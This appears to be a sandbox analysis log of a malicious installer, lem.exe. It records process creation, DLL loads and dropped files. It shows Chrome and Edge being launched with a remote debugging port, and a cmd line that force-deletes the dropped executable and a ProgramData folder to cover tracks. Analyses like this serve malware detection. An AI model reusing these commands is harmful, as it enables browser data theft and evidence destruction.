Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp "C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp" /SL5="$2043C,15291586,119296,C:\Users\user\Desktop\lem.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" allodial.a3x	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" & rd /s /q "C:\ProgramData\hvaa1" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2296,i,2357709193393585783,5319373737350838943,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2348,i,10661538599108609215,1196601915293608735,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5888 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7004 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\lem.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: oledlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0095F511 push ecx; ret		6_2_0095F524
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00961815 push ecx; ret		6_2_00961828

Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.TeamFoundation.WorkItemTracking.Controls.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-V97C3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-VDE8M.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\System.Data.SQLite.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\gss-server.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-8D7A3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	File created: C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-UGAPQ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\git-upload-archive.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-H4CCE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-8NH1K.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	File created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\WzWXFog64.dll (copy)	Jump to dropped file
